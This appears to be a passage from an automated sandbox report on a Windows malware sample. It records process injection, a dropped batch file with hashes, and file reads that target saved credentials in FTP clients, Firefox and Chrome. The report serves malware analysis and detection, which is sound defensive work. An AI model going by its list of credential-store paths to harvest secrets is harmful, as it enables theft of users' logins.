| pnrpnsp.dll | 0x74890000 | 0x748a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| napinsp.dll | 0x748c0000 | 0x748cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x74d30000 | 0x74d6ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x74d70000 | 0x74e64fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| samlib.dll | 0x74e70000 | 0x74e81fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x74eb0000 | 0x7504dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wshtcpip.dll | 0x754b0000 | 0x754b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x75580000 | 0x75596fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x75820000 | 0x75863fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x75960000 | 0x7599bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x75d70000 | 0x75d88fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75e00000 | 0x75e1afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75e20000 | 0x75e2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x75ed0000 | 0x75edafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x75f40000 | 0x75f4bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x75f50000 | 0x75f61fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x76050000 | 0x7616cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x76170000 | 0x76196fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x763a0000 | 0x763e4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x763f0000 | 0x765eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76600000 | 0x766f4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x77600000 | 0x77682fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x77690000 | 0x7771efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x77830000 | 0x77965fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x77c70000 | 0x77c74fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x77cd0000 | 0x77e6cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
|
For performance reasons, the remaining 4 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #1: c:\users\eebsym5\desktop\3838612080743901967.exe | 0x97c | address = 0x400000, size = 102400 |
|
1 | |
| Modify Memory | #1: c:\users\eebsym5\desktop\3838612080743901967.exe | 0x97c | address = 0x140000, size = 4096 |
|
1 | |
| Modify Control Flow | #1: c:\users\eebsym5\desktop\3838612080743901967.exe | 0x97c | os_tid = 0xa50, address = 0x77f07098 |
|
1 |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\eebsym5\appdata\local\temp\18144644.bat | 0.09 KB |
MD5:
3880eeb1c736d853eb13b44898b718ab
SHA1: 4eec9d50360cd815211e3c4e6bdd08271b6ec8e6 SHA256: 936d9411d5226b7c5a150ecaf422987590a8870c8e095e1caa072273041a86e7 |
|
|
Host Behavior
COM (1)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | 3C374A40-BAE4-11CF-BF7D-00AA006946EE | 3C374A41-BAE4-11CF-BF7D-00AA006946EE | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER |
|
1 |
File (155)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\HWID | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\wcx_ftp.ini | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\wcx_ftp.ini | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\GHISLER\wcx_ftp.ini | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\GHISLER\wcx_ftp.ini | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\GHISLER\wcx_ftp.ini | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\CuteFTP\sm.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\CuteFTP\sm.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\CuteFTP\sm.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Program Files\GlobalSCAPE\CuteFTP\sm.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Program Files\GlobalSCAPE\CuteFTP Pro\sm.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Program Files\GlobalSCAPE\CuteFTP Lite\sm.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Program Files\CuteFTP\sm.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\FlashFXP\3\Sites.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\FlashFXP\4\Sites.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\FlashFXP\3\Quick.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\FlashFXP\4\Quick.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\FlashFXP\3\History.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\FlashFXP\4\History.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\FlashFXP\3\Sites.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\FlashFXP\4\Sites.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\FlashFXP\3\Quick.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\FlashFXP\4\Quick.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\FlashFXP\3\History.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\FlashFXP\4\History.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\FlashFXP\3\Sites.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\FlashFXP\4\Sites.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\FlashFXP\3\Quick.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\FlashFXP\4\Quick.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\FlashFXP\3\History.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\FlashFXP\4\History.dat | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\FileZilla\sitemanager.xml | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\FileZilla\recentservers.xml | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\FileZilla\filezilla.xml | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\FileZilla\sitemanager.xml | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\FileZilla\recentservers.xml | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\FileZilla\filezilla.xml | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\FileZilla\sitemanager.xml | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\FileZilla\recentservers.xml | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\FileZilla\filezilla.xml | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\ExpanDrive\drives.js | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\ExpanDrive\drives.js | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\ExpanDrive\drives.js | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\SharedSettings.ccs | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\SharedSettings.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\SharedSettings_1_0_5.ccs | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\SharedSettings_1_0_5.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\SharedSettings.ccs | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\SharedSettings.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\SharedSettings_1_0_5.ccs | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\SharedSettings_1_0_5.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\SharedSettings.ccs | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\SharedSettings.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\SharedSettings_1_0_5.ccs | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\SharedSettings_1_0_5.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\CoffeeCup Software\SharedSettings.ccs | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\CoffeeCup Software\SharedSettings.ccs | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\CoffeeCup Software\SharedSettings.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Windows\32BitFtp.ini | desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\profiles.ini | desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
4 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\profiles.ini | desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
4 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Google\Chrome\User Data\Default\Web Data | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Google\Chrome\User Data\Default\Login Data | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\Client Hash | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\18144644.bat | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\ | type = file_attributes |
|
4 | |
| Get Info | C:\Program Files\Mozilla Firefox | type = file_attributes |
|
4 | |
| Get Info | - | type = size |
|
8 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Profiles\ | type = file_attributes |
|
2 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Google\Chrome\User Data\Default\Web Data | size = 4096, size_out = 4096 |
|
17 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Google\Chrome\User Data\Default\Web Data | size = 4096, size_out = 0 |
|
2 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Google\Chrome\User Data\Default\Login Data | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Google\Chrome\User Data\Default\Login Data | size = 4096, size_out = 2048 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Google\Chrome\User Data\Default\Login Data | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal | size = 4096, size_out = 0 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Local\Temp\18144644.bat | size = 94 |
|
1 |
Registry (2445)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\WinRAR | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\WinRAR | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 25.0 (x86 en-US) | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2 | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PRJPROR | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUSR | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.VISIOR | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83217045FF} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{444C5574-6BE0-323E-9BDD-922F6C3C4A04} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{582EA838-9199-3518-A05C-DB09462F68EC} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{68306422-7C57-373F-8860-D26CE4BA2A15} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PRJPROR_{99ACCA38-6DD3-48A8-96AE-A283C9759279} | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{99ACCA38-6DD3-48A8-96AE-A283C9759279} | - |
|
2 | |
